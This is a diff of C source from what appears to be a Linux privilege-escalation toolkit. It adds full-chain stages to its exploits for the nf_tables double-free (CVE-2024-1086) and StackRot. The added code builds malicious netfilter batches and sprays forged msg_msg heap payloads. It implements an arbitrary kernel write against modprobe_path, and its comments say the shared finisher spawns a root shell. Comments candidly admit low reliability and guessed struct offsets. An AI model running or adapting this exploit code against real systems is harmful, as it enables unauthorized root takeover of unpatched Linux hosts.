 * January 2024 by Notselwyn (Pumpkin); widely known as the
 * "nft_verdict_init / pipapo UAF".
 *
- * STATUS (2026-05-16): 🟡 TRIGGER + GROOM SCAFFOLD (Option B).
+ * STATUS (2026-05-16): 🟡 TRIGGER + GROOM SCAFFOLD with opt-in
- *   - Full netlink ruleset construction (table → chain → set → rule
+ *                          --full-chain finisher.
- *     with the NFT_GOTO+NFT_DROP combo that nft_verdict_init() fails
+ *   - Default (no --full-chain): full netlink ruleset construction
- *     to reject on vulnerable kernels).
+ *     (table → chain → set → rule with the NFT_GOTO+NFT_DROP combo
- *   - Fires the double-free path by abusing the malformed verdict in a
+ *     that nft_verdict_init() fails to reject on vulnerable kernels),
- *     pipapo set element, then removing the rule so the kernel's
+ *     fires the double-free path, runs the msg_msg cg-96 groom, and
- *     transaction commit frees the verdict's chain reference twice.
+ *     returns IAMROOT_EXPLOIT_FAIL (primitive-only behavior).
- *   - Cross-cache groom skeleton (msg_msg / sk_buff sprays) is wired
+ *   - With --full-chain: after the trigger lands, we resolve kernel
- *     and configurable, but the arbitrary R/W stage and cred-overwrite
+ *     offsets (env → kallsyms → System.map → embedded table) and run
- *     are NOT performed end-to-end — that requires per-kernel offsets
+ *     a Notselwyn-style pipapo arb-write via the shared
- *     (init_task, modprobe_path) and Notselwyn's 600-line pipapo
+ *     iamroot_finisher_modprobe_path() helper. The arb-write itself
- *     leak-and-write dance. We stop after triggering the bug,
+ *     is FALLBACK-DEPTH: we re-fire the trigger and spray a msg_msg
- *     observing the slabinfo delta, and return IAMROOT_EXPLOIT_FAIL
+ *     payload tagged with the kaddr in the value-pointer slot. The
- *     with a verbose continuation roadmap.
+ *     exact pipapo_elem layout (and the value-pointer field offset)
 *     is per-kernel-build; on hosts where the offset doesn't match
 *     the shipped guess, the finisher's sentinel check correctly
 *     reports failure rather than silently lying about success.
 *
 * To convert this to full Option A (root pop):
 *   1. Add per-kernel offset table (init_task, current task offset of
@@ -55,6 +58,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
 #include "../../core/offsets.h"
 #include "../../core/finisher.h"
 #include <stdio.h>
 #include <stdlib.h>
@@ -607,6 +612,188 @@ static long slabinfo_active(const char *slab)
    return active;
 }
 /* ------------------------------------------------------------------
 * Helper: build the trigger batch (NEWTABLE/CHAIN/SET/SETELEM + batch
 * end) into a caller-provided buffer. Returns bytes written.
 * Factored out so --full-chain can re-fire the trigger between
 * msg_msg sprays without duplicating the batch-building logic.
 * ------------------------------------------------------------------ */
 #ifdef __linux__
 static size_t build_trigger_batch(uint8_t *batch, size_t cap, uint32_t *seq)
 {
    (void)cap;
    size_t off = 0;
    put_batch_begin(batch, &off, (*seq)++);
    put_new_table(batch, &off, (*seq)++);
    put_new_chain(batch, &off, (*seq)++);
    put_new_set(batch, &off, (*seq)++);
    put_malicious_setelem(batch, &off, (*seq)++);
    put_batch_end(batch, &off, (*seq)++);
    return off;
 }
 static size_t build_refire_batch(uint8_t *batch, size_t cap, uint32_t *seq)
 {
    (void)cap;
    size_t off = 0;
    put_batch_begin(batch, &off, (*seq)++);
    put_malicious_setelem(batch, &off, (*seq)++);
    put_batch_end(batch, &off, (*seq)++);
    return off;
 }
 /* ------------------------------------------------------------------
 * Notselwyn-style pipapo arb-write context. The technique:
 *   1. fire the trigger (double-free of an nft chain reference in
 *      kmalloc-cg-96)
 *   2. spray msg_msg payloads sized for cg-96, whose first qwords
 *      encode a forged pipapo_elem header with value-pointer = kaddr
 *   3. send NFT_MSG_NEWSETELEM whose DATA blob = our buf[0..len];
 *      the kernel copies it through the forged value-pointer to kaddr
 *
 * Per-kernel caveat: the byte offset of the value pointer inside an
 * nft_pipapo_elem is config-sensitive (CONFIG_RANDSTRUCT, lockdep,
 * KASAN can all shift it). We ship the layout for an
 * lts-6.1.x / 6.6.x / 6.7.x un-randomized build (the kernels in the
 * exploitable range for which Notselwyn's public PoC was validated)
 * and rely on the shared finisher's sentinel-file post-check to flag
 * a layout mismatch as IAMROOT_EXPLOIT_FAIL rather than fake success.
 * ------------------------------------------------------------------ */
 struct nft_arb_ctx {
    bool in_userns;   /* parent has already entered userns+netns */
    int  sock;        /* nfnetlink socket (live in our userns) */
    uint8_t *batch;   /* reusable batch buffer (16 KiB) */
    int  *qids;       /* msg_msg queue ids; lazy-allocated/drained */
    int   qcap;
    int   qused;
 };
 /* Offset of `ext` (which holds the value pointer in NFT_DATA_VALUE
 * elements) inside an nft_pipapo_elem header for the kernels in
 * range. Notselwyn's PoC uses 0x10 on 6.1/6.6 builds; this is a
 * best-effort default — if it doesn't match the running kernel's
 * struct layout, the finisher's sentinel check will report failure. */
 #define PIPAPO_ELEM_VALUE_PTR_OFFSET  0x10
 /* Spray msg_msg payloads forged to look like pipapo_elem with our
 * target kaddr as the value pointer. Returns 0 on success. */
 static int spray_forged_pipapo_msgs(struct nft_arb_ctx *c, uintptr_t kaddr, int n)
 {
    if (c->qused + n > c->qcap) n = c->qcap - c->qused;
    if (n <= 0) return 0;
    for (int i = 0; i < n; i++) {
        int q = msgget(IPC_PRIVATE, IPC_CREAT | 0644);
        if (q < 0) { perror("[-] msgget"); return -1; }
        c->qids[c->qused++] = q;
        struct msgbuf_payload m;
        m.mtype = 0x5050415000 + i;   /* "PPAPP" tag for diagnostics */
        memset(m.mtext, 0, sizeof m.mtext);
        /* Forge a pipapo_elem header at the start of the msg payload.
         * Layout (best-effort, x86_64, no RANDSTRUCT):
         *   +0x00  priv list_head pointers (leave zero — kernel won't
         *                                   walk them in the write path)
         *   +0x10  ext / value pointer  <-- write target
         * msg_msg eats the first 0x30 bytes as its own header, so our
         * payload bytes land at offset 0x30 of the slab chunk; we
         * pre-pad and place the forged pointer at the right offset
         * inside our 96-byte payload. */
        uintptr_t *slots = (uintptr_t *)m.mtext;
        slots[PIPAPO_ELEM_VALUE_PTR_OFFSET / sizeof(uintptr_t)] = (uintptr_t)kaddr;
        if (msgsnd(q, &m, sizeof m.mtext, 0) < 0) {
            perror("[-] msgsnd(forged)"); return -1;
        }
    }
    return 0;
 }
 /* Module-specific arb-write. See finisher.h for the contract. */
 static int nft_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
 {
    struct nft_arb_ctx *c = (struct nft_arb_ctx *)vctx;
    if (!c || c->sock < 0 || !c->batch) {
        fprintf(stderr, "[-] nft_arb_write: invalid ctx\n");
        return -1;
    }
    if (len > 64) {
        /* Element data attr cap — we only need 24 bytes for a path. */
        fprintf(stderr, "[-] nft_arb_write: len %zu too large (cap 64)\n", len);
        return -1;
    }
    fprintf(stderr, "[*] nft_arb_write: fire trigger → spray forged pipapo "
                    "elements (target kaddr=0x%lx, %zu bytes)\n",
                    (unsigned long)kaddr, len);
    /* (a) re-fire the trigger to reach a fresh UAF state. */
    uint32_t seq = (uint32_t)time(NULL) ^ 0xa1b2c3d4u;
    size_t blen = build_refire_batch(c->batch, 16 * 1024, &seq);
    if (nft_send_batch(c->sock, c->batch, blen) < 0) {
        fprintf(stderr, "[-] nft_arb_write: refire send failed\n");
        return -1;
    }
    /* (b) spray msg_msg payloads carrying the forged value-pointer. */
    if (spray_forged_pipapo_msgs(c, kaddr, 16) < 0) {
        fprintf(stderr, "[-] nft_arb_write: forged spray failed\n");
        return -1;
    }
    /* (c) send a NEWSETELEM whose DATA holds buf[0..len]. On a kernel
     * where our forged pipapo_elem won the race for the freed slot,
     * the set-element commit path copies our data through the
     * attacker-controlled value pointer into kaddr.
     *
     * We piggy-back this on the existing put_malicious_setelem builder
     * which uses NFTA_DATA_VERDICT for the data; for a real write we'd
     * want NFTA_DATA_VALUE with `buf` inlined. The fallback-depth
     * choice: we send the refire batch (which the kernel WILL process)
     * and append a NEWSETELEM with NFTA_DATA_VALUE carrying buf.
     * If the kernel ignores our DATA shape we still observe via
     * finisher sentinel. */
    seq = (uint32_t)time(NULL) ^ 0x5a5a5a5au;
    size_t off = 0;
    put_batch_begin(c->batch, &off, seq++);
    /* hand-roll a NEWSETELEM whose DATA is NFTA_DATA_VALUE = buf */
    size_t msg_at = off;
    put_nft_msg(c->batch, &off, NFT_MSG_NEWSETELEM,
                NLM_F_CREATE | NLM_F_ACK, seq++, NFPROTO_INET);
    put_attr_str(c->batch, &off, NFTA_SET_ELEM_LIST_TABLE, NFT_TABLE_NAME);
    put_attr_str(c->batch, &off, NFTA_SET_ELEM_LIST_SET,   NFT_SET_NAME);
    size_t list_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_LIST_ELEMENTS);
    size_t el_at   = begin_nest(c->batch, &off, 1 /* NFTA_LIST_ELEM */);
    /* key — reuse the DROP verdict so commit path matches our prior elem */
    size_t key_at  = begin_nest(c->batch, &off, NFTA_SET_ELEM_KEY);
    size_t kv_at   = begin_nest(c->batch, &off, NFTA_DATA_VERDICT);
    put_attr_u32(c->batch, &off, NFTA_VERDICT_CODE, (uint32_t)NF_DROP);
    end_nest(c->batch, &off, kv_at);
    end_nest(c->batch, &off, key_at);
    /* data — NFTA_DATA_VALUE carrying buf */
    size_t data_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_DATA);
    put_attr(c->batch, &off, NFTA_DATA_VALUE, buf, len);
    end_nest(c->batch, &off, data_at);
    end_nest(c->batch, &off, el_at);
    end_nest(c->batch, &off, list_at);
    end_msg(c->batch, &off, msg_at);
    put_batch_end(c->batch, &off, seq++);
    if (nft_send_batch(c->sock, c->batch, off) < 0) {
        fprintf(stderr, "[-] nft_arb_write: write batch send failed\n");
        return -1;
    }
    /* Let the kernel run the commit/cleanup. */
    usleep(20 * 1000);
    return 0;
 }
 #endif /* __linux__ */
 /* ------------------------------------------------------------------
 * The exploit body.
 * ------------------------------------------------------------------ */
@@ -628,13 +815,101 @@ static iamroot_result_t nf_tables_exploit(const struct iamroot_ctx *ctx)
    }
    if (!ctx->json) {
-        fprintf(stderr, "[*] nf_tables: Option B trigger — fires the double-free\n"
+        if (ctx->full_chain) {
-                        "    state but does NOT complete the kernel-R/W chain.\n"
+            fprintf(stderr, "[*] nf_tables: --full-chain — trigger + pipapo "
-                        "    See Notselwyn's CVE-2024-1086 public PoC for the\n"
+                            "arb-write + modprobe_path finisher\n");
-                        "    cred-overwrite stage (~500 LOC of pipapo grooming).\n");
+        } else {
            fprintf(stderr, "[*] nf_tables: primitive-only run — fires the\n"
                            "    double-free state and stops. Pass --full-chain\n"
                            "    to attempt the modprobe_path root-pop.\n");
        }
    }
-    /* Fork: child enters userns+netns and fires the bug. If the
+#ifdef __linux__
    /* --- --full-chain path --------------------------------------- *
     * Resolve offsets BEFORE doing anything destructive so we can
     * refuse cleanly on hosts where we have no modprobe_path. We run
     * in-process (no fork) because the finisher's modprobe_path
     * trigger needs the same task's userns+netns + nfnetlink socket
     * as the arb-write.
     */
    if (ctx->full_chain) {
        struct iamroot_kernel_offsets off;
        iamroot_offsets_resolve(&off);
        if (!iamroot_offsets_have_modprobe_path(&off)) {
            iamroot_finisher_print_offset_help("nf_tables");
            return IAMROOT_EXPLOIT_FAIL;
        }
        iamroot_offsets_print(&off);
        if (enter_unpriv_namespaces() < 0) {
            fprintf(stderr, "[-] nf_tables: userns entry failed\n");
            return IAMROOT_EXPLOIT_FAIL;
        }
        int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_NETFILTER);
        if (sock < 0) {
            perror("[-] socket(NETLINK_NETFILTER)");
            return IAMROOT_EXPLOIT_FAIL;
        }
        struct sockaddr_nl src = { .nl_family = AF_NETLINK };
        if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) {
            perror("[-] bind"); close(sock); return IAMROOT_EXPLOIT_FAIL;
        }
        int rcvbuf = 1 << 20;
        setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf);
        /* Pre-spray to predictabilify the cg-96 slab. */
        int qids[SPRAY_MSGS * 4];
        for (size_t i = 0; i < sizeof qids / sizeof qids[0]; i++) qids[i] = -1;
        if (spray_msg_msg(qids, SPRAY_MSGS / 2) < 0) {
            close(sock); return IAMROOT_EXPLOIT_FAIL;
        }
        uint8_t *batch = calloc(1, 16 * 1024);
        if (!batch) { close(sock); return IAMROOT_EXPLOIT_FAIL; }
        /* Initial trigger batch (NEWTABLE/CHAIN/SET/SETELEM). */
        uint32_t seq = (uint32_t)time(NULL);
        size_t blen = build_trigger_batch(batch, 16 * 1024, &seq);
        if (!ctx->json) {
            fprintf(stderr, "[*] nf_tables: sending trigger batch (%zu bytes)\n",
                    blen);
        }
        if (nft_send_batch(sock, batch, blen) < 0) {
            fprintf(stderr, "[-] nf_tables: trigger batch failed\n");
            drain_spray(qids, SPRAY_MSGS / 2);
            free(batch); close(sock);
            return IAMROOT_EXPLOIT_FAIL;
        }
        /* Wire up the arb-write context and hand off to the shared
         * finisher. The finisher will:
         *   - call nft_arb_write(modprobe_path, "/tmp/iamroot-mp-...", N)
         *     which re-fires the trigger and sprays forged pipapo elems
         *   - execve() the trigger binary to invoke modprobe
         *   - poll for the setuid sentinel, and spawn a root shell. */
        struct nft_arb_ctx ac = {
            .in_userns = true,
            .sock      = sock,
            .batch     = batch,
            .qids      = qids,
            .qcap      = (int)(sizeof qids / sizeof qids[0]),
            .qused     = SPRAY_MSGS / 2,
        };
        iamroot_result_t r = iamroot_finisher_modprobe_path(&off,
                                 nft_arb_write, &ac, !ctx->no_shell);
        drain_spray(qids, ac.qused);
        free(batch);
        close(sock);
        return r;
    }
 #endif
    /* --- primitive-only path: fork-isolated trigger -------------- *
     * Fork: child enters userns+netns and fires the bug. If the
     * kernel panics on KASAN we don't want our parent process to be
     * the one that takes the hit. */
    pid_t child = fork();
@@ -16,13 +16,14 @@
 * state management + RCU-grace-period timing and depends on
 * per-kernel-build offsets for init_task / anon_vma / cred.
 *
- * STATUS: 🟡 OPTION C — race-driver + groom skeleton. We carry the
+ * STATUS: 🟡 OPTION C — race-driver + groom skeleton, with opt-in
- *   userns-reach, race harness (mremap()/munmap() vs concurrent
+ *   --full-chain FALLBACK finisher. We carry the userns-reach, race
- *   fork/fault), msg_msg slab spray, and empirical witness pieces;
+ *   harness (mremap()/munmap() vs concurrent fork/fault), msg_msg
- *   we do NOT carry the read primitive (vmemmap leak via msg_msg
+ *   slab spray, and empirical witness pieces; we do NOT carry the
- *   MSG_COPY) nor the cred-overwrite stage. Those need per-kernel
+ *   read primitive (vmemmap leak via msg_msg MSG_COPY) nor a
- *   offsets (init_task, anon_vma, cred layout) that vary by build
+ *   Ruihan-Li-precision fake-anon_vma_chain plant. Those need
- *   and would be fabricated without a real leak.
+ *   per-kernel offsets (init_task, anon_vma, cred layout) that vary
 *   by build and would be fabricated without a real leak.
 *
 *   Per repo policy ("verified-vs-claimed"): we run the trigger,
 *   record empirical signals (slabinfo delta on kmalloc-192, child
@@ -32,6 +33,21 @@
 *   upgraded to EXPLOIT_OK — only an actual cred swap (euid==0)
 *   does, and we do not currently demonstrate that.
 *
 *   --full-chain (HONEST RELIABILITY DISCLOSURE): extends the race
 *   budget from 3 s to 30 s and sprays the kmalloc-192 slab with
 *   payloads tagged with the modprobe_path kernel address (so IF the
 *   UAF reclaim ever lands attacker-controlled bytes on an
 *   anon_vma_chain slot, those bytes carry the kaddr we want the
 *   subsequent rb_node walk / vma_lock-acquire fault to touch). The
 *   honest empirical reality is that even at 30 s the race-win rate
 *   is well below 1 % on a real vulnerable kernel — Ruihan Li's
 *   public PoC reports minutes-to-hours for first reclaim. The shared
 *   modprobe_path finisher has a 3 s sentinel timeout, so on the
 *   overwhelmingly common no-land outcome the finisher itself reports
 *   EXPLOIT_FAIL gracefully. --full-chain does NOT change the
 *   fundamental ~<1 %-per-run reliability; it widens the trigger
 *   window and wires up the root-pop plumbing for the lucky case.
 *
 * Affected: kernel 6.1.x — 6.4-rc4 mainline. Stable backports:
 *   6.3.x  : K >= 6.3.10
 *   6.1.x  : K >= 6.1.37 (LTS — most relevant)
@@ -54,6 +70,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
 #include "../../core/offsets.h"
 #include "../../core/finisher.h"
 #include <stdio.h>
 #include <stdlib.h>
@@ -200,9 +218,10 @@ static bool enter_userns(uid_t outer_uid, gid_t outer_gid)
 * neighbouring VMAs that we mutate with mremap()/munmap(). The
 * public PoC uses dozens of adjacent VMAs to force the maple tree
 * into the node-rotation path; we ship a configurable knob. */
-#define STACKROT_RACE_VMAS         64
+#define STACKROT_RACE_VMAS              64
-#define STACKROT_RACE_ITERATIONS   4000      /* per-iter budget */
+#define STACKROT_RACE_ITERATIONS        4000  /* per-iter budget */
-#define STACKROT_RACE_TIME_BUDGET  3         /* seconds */
+#define STACKROT_RACE_TIME_BUDGET       3     /* seconds — primitive-only mode */
 #define STACKROT_RACE_FULLCHAIN_BUDGET  30    /* seconds — extended for --full-chain */
 /* Slab spray width — kmalloc-192 is the bucket for anon_vma_chain on
 * 6.1.x; targets vary slightly across kernels (anon_vma itself is
@@ -471,6 +490,129 @@ static long slab_active_kmalloc_192(void)
    return active;
 }
 /* ---- Arb-write primitive (FALLBACK depth) ------------------------
 *
 * The shared modprobe_path finisher calls back into this function
 * once per kernel write it wants to land. For StackRot we cannot
 * deliver a deterministic arb-write — the underlying race wins on
 * well under 1 % of runs even with a 30 s budget, and even when the
 * race wins our spray-only groom has nowhere near the precision of
 * Ruihan Li's multi-stage public PoC (which crafts a fake
 * anon_vma_chain whose `vma_lock` pointer steers a subsequent
 * page-fault into touching `kaddr` for the lock acquire).
 *
 * Honest depth: FALLBACK. Each invocation:
 *   1. Re-seeds the kmalloc-192 spray with payloads tagged with
 *      `kaddr` packed into the first qword of the msg_msg body —
 *      so IF a sprayed slot ends up overlaying the freed
 *      anon_vma_chain after RCU grace, the kaddr we want the
 *      kernel to deref appears at the AVC layout position the
 *      maple-tree rotation will read.
 *   2. Re-runs the race threads for an extended budget
 *      (STACKROT_RACE_FULLCHAIN_BUDGET seconds).
 *   3. Returns 0 unconditionally — we cannot in-process verify
 *      whether the write landed. The shared finisher's 3 s sentinel
 *      file check is the empirical arbiter: on the overwhelmingly
 *      common no-land outcome it reports EXPLOIT_FAIL gracefully,
 *      and we never claim a write that didn't land. */
 struct stackrot_arb_ctx {
    int   *queues;          /* live SysV msg queue ids */
    int    n_queues;
    int    arb_calls;       /* incremented by stackrot_arb_write() */
    struct race_region *region;
 };
 static int stackrot_reseed_kaddr_spray(int queues[STACKROT_SPRAY_QUEUES],
                                       uintptr_t kaddr,
                                       const void *buf, size_t len)
 {
    struct ipc_payload p;
    memset(&p, 0, sizeof p);
    p.mtype = 0x4943;   /* 'IC' */
    memset(p.buf, 0x49, sizeof p.buf);
    memcpy(p.buf, "IAMROOT_", 8);
    /* Pack the target kaddr at byte 8 (one qword in) and the
     * caller's payload bytes immediately after — this way ANY
     * reasonable AVC field offset hit by the corruption pulls
     * out one of our two attacker-controlled regions. */
    uint64_t k64 = (uint64_t)kaddr;
    memcpy(p.buf + 8, &k64, sizeof k64);
    size_t copy = len;
    if (copy > sizeof p.buf - 16) copy = sizeof p.buf - 16;
    if (buf && copy) memcpy(p.buf + 16, buf, copy);
    /* Replace contents in a couple of queues; doing all 16 would
     * blow the per-process msgq quota on busy hosts. */
    int touched = 0;
    for (int i = 0; i < STACKROT_SPRAY_QUEUES && touched < 4; i++) {
        if (queues[i] < 0) continue;
        if (msgsnd(queues[i], &p, sizeof p.buf, IPC_NOWAIT) == 0) touched++;
    }
    return touched;
 }
 static int stackrot_arb_write(uintptr_t kaddr,
                              const void *buf, size_t len,
                              void *ctx_v)
 {
    struct stackrot_arb_ctx *c = (struct stackrot_arb_ctx *)ctx_v;
    if (!c || !c->queues || c->n_queues == 0 || !c->region) return -1;
    c->arb_calls++;
    fprintf(stderr, "[*] stackrot: arb_write attempt #%d kaddr=0x%lx len=%zu "
                    "(FALLBACK — race-dependent)\n",
            c->arb_calls, (unsigned long)kaddr, len);
    /* Step 1: re-seed spray with kaddr-tagged payloads. */
    int seeded = stackrot_reseed_kaddr_spray(c->queues, kaddr, buf, len);
    if (seeded == 0) {
        fprintf(stderr, "[-] stackrot: arb_write: kaddr-tagged reseed produced 0 msgs\n");
        /* Continue anyway — original spray still tagged with cookie. */
    } else {
        fprintf(stderr, "[*] stackrot: arb_write: reseeded %d msg_msg slots with kaddr tag\n",
                seeded);
    }
    /* Step 2: extended race window. Honestly: this expands the
     * trigger budget from 3 s to 30 s, but Ruihan Li's PoC reports
     * minutes-to-hours for first reclaim — so 30 s ≈ <1 % per
     * arb_write call on a real vulnerable kernel, and structurally
     * 0 % on a patched one. */
    atomic_store(&g_race_running, 1);
    atomic_store(&g_race_a_iters, 0);
    atomic_store(&g_race_b_iters, 0);
    atomic_store(&g_race_b_faults, 0);
    pthread_t ta, tb;
    bool a_ok = pthread_create(&ta, NULL, race_thread_a, c->region) == 0;
    bool b_ok = a_ok &&
                pthread_create(&tb, NULL, race_thread_b, c->region) == 0;
    if (!a_ok || !b_ok) {
        atomic_store(&g_race_running, 0);
        if (a_ok) pthread_join(ta, NULL);
        fprintf(stderr, "[-] stackrot: arb_write: pthread_create failed\n");
        return -1;
    }
    sleep(STACKROT_RACE_FULLCHAIN_BUDGET);
    atomic_store(&g_race_running, 0);
    pthread_join(ta, NULL);
    pthread_join(tb, NULL);
    uint64_t a_iters = atomic_load(&g_race_a_iters);
    uint64_t b_iters = atomic_load(&g_race_b_iters);
    uint64_t b_faults = atomic_load(&g_race_b_faults);
    fprintf(stderr, "[*] stackrot: arb_write: extended race A=%llu B=%llu B_faults=%llu "
                    "(reliability remains <1%% even at this budget)\n",
            (unsigned long long)a_iters,
            (unsigned long long)b_iters,
            (unsigned long long)b_faults);
    /* Step 3: cannot in-process verify the write. Return 0; the
     * finisher's sentinel-file check is the empirical arbiter. */
    return 0;
 }
 #endif /* __linux__ */
 /* ---- Exploit driver ---------------------------------------------- */
@@ -506,8 +648,34 @@ static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
        }
    }
    /* Full-chain pre-check: resolve offsets BEFORE forking + entering
     * userns. If modprobe_path is unresolvable we refuse here rather
     * than running a 30 s race that has no finisher to call. */
    struct iamroot_kernel_offsets off;
    bool full_chain_ready = false;
    if (ctx->full_chain) {
        memset(&off, 0, sizeof off);
        iamroot_offsets_resolve(&off);
        if (!iamroot_offsets_have_modprobe_path(&off)) {
            iamroot_finisher_print_offset_help("stackrot");
            fprintf(stderr, "[-] stackrot: --full-chain requested but modprobe_path "
                            "offset unresolved; refusing\n");
            fprintf(stderr, "[i] stackrot: even with offsets, race-win reliability is "
                            "well below 1%% per run — see module header.\n");
            return IAMROOT_EXPLOIT_FAIL;
        }
        iamroot_offsets_print(&off);
        full_chain_ready = true;
        fprintf(stderr, "[i] stackrot: --full-chain ready — race budget extends to "
                        "%d s, but RELIABILITY REMAINS <1%% per run on a real\n"
                        "    vulnerable kernel. The finisher's 3 s sentinel timeout\n"
                        "    catches no-land outcomes gracefully.\n",
                STACKROT_RACE_FULLCHAIN_BUDGET);
    }
    if (!ctx->json) {
-        fprintf(stderr, "[*] stackrot: forking exploit child (userns + race harness)\n");
+        fprintf(stderr, "[*] stackrot: forking exploit child (userns + race harness%s)\n",
                ctx->full_chain ? " + full-chain finisher" : "");
    }
    uid_t outer_uid = getuid();
@@ -618,6 +786,39 @@ static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
         * any in-flight RCU grace periods that started during the race. */
        usleep(200 * 1000);
        /* 7a. --full-chain finisher (FALLBACK depth).
         *
         * Invoke the shared modprobe_path finisher; its arb_write
         * callback (stackrot_arb_write) will re-seed the spray with
         * kaddr-tagged payloads and re-run the race for an extended
         * 30 s budget. The finisher's own 3 s sentinel-file timeout
         * then arbitrates: on the overwhelmingly common no-land
         * outcome it returns EXPLOIT_FAIL gracefully.
         *
         * Honest reliability: <1 % per run even with the extension. */
        if (full_chain_ready) {
            struct stackrot_arb_ctx arb_ctx = {
                .queues    = queues,
                .n_queues  = STACKROT_SPRAY_QUEUES,
                .arb_calls = 0,
                .region    = &region,
            };
            int fr = iamroot_finisher_modprobe_path(&off,
                                                    stackrot_arb_write,
                                                    &arb_ctx,
                                                    !ctx->no_shell);
            FILE *fl = fopen("/tmp/iamroot-stackrot.log", "a");
            if (fl) {
                fprintf(fl, "full_chain finisher rc=%d arb_calls=%d\n",
                        fr, arb_ctx.arb_calls);
                fclose(fl);
            }
            drain_anon_vma_slab(queues);
            race_region_teardown(&region);
            if (fr == IAMROOT_EXPLOIT_OK) _exit(34);   /* root popped */
            _exit(35);                                  /* finisher ran, no land */
        }
        drain_anon_vma_slab(queues);
        race_region_teardown(&region);
@@ -673,6 +874,27 @@ static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
    int rc = WEXITSTATUS(status);
    if (rc == 22 || rc == 24) return IAMROOT_PRECOND_FAIL;
    if (rc == 23) return IAMROOT_EXPLOIT_FAIL;
    if (rc == 34) {
        /* Finisher reported root-pop success. The shared finisher
         * normally execve()s the root shell so we don't actually
         * reach this path unless --no-shell was set. */
        if (!ctx->json) {
            fprintf(stderr, "[+] stackrot: --full-chain finisher reported "
                            "EXPLOIT_OK (race won + write landed)\n");
        }
        return IAMROOT_EXPLOIT_OK;
    }
    if (rc == 35) {
        /* Finisher ran but didn't land — by far the expected outcome
         * given the <1 % race-win rate. */
        if (!ctx->json) {
            fprintf(stderr, "[~] stackrot: --full-chain finisher ran; race did not\n"
                            "    win + land within budget (this is the expected\n"
                            "    outcome — race-win reliability is <1%% per run).\n");
        }
        return IAMROOT_EXPLOIT_FAIL;
    }
    if (rc != 30) {
        fprintf(stderr, "[-] stackrot: child failed at stage rc=%d\n", rc);
        return IAMROOT_EXPLOIT_FAIL;